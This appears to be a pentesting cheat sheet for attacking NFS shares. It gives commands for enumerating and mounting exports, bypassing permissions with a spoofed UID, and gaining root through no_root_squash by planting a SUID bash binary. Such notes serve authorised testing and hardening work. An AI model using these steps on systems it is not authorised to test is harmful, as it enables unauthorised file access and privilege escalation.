111 - NFS

Mount remote share

Enumerate shared folders

showmount -e <IP>

Mount folder

mkdir <folder>
mount -t nfs <rhost>:<path> <local folder> -o nolock
mount -t nfs -o vers=2 <rhost>:<path> <local folder> -o nolock


Gain ownership of folders

Navigate to the mounted folder and obtain the UID of the file owner. Then create a new user on your machine with the same UID, unmount the remote folder, switch to the new user and mount again. This will allow you to ignore access control on the folders since NFS check for permissions client-side

useradd <username> -u <UID> -m -s /bin/bash
su <username>

NFS no_root_squash

On local machine

Write a SUID executable to the remote share (copy /bin/sh or compile your own executable then chmod +s the payload)

mkdir /tmp/remote
mount -t nfs <rhost>:<shared folder> /tmp/remote
cd /tmp/remote
cp /bin/bash .
chmod +s bash

On target

Navigate to the shared folder and execute the payload, if /bin/bash was used, remember to invoke it with -p switch or the SUID bit will be dropped

cd <shared folder>
./bash -p

Last updated